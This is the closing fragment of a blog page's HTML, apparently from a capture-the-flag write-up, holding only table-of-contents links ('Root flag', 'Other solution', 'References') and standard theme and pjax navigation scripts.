class="nav-text">Root flag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Other-solution"><span class="nav-number">2.6.</span> <span class="nav-text">Other solution</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#References"><span class="nav-number">3.</span> <span class="nav-text">References</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="pjax">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->

    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart()
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd()
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'))
            KEEP.initExecute()
        });
    });
</script>




    
        
    

</body>
</html>
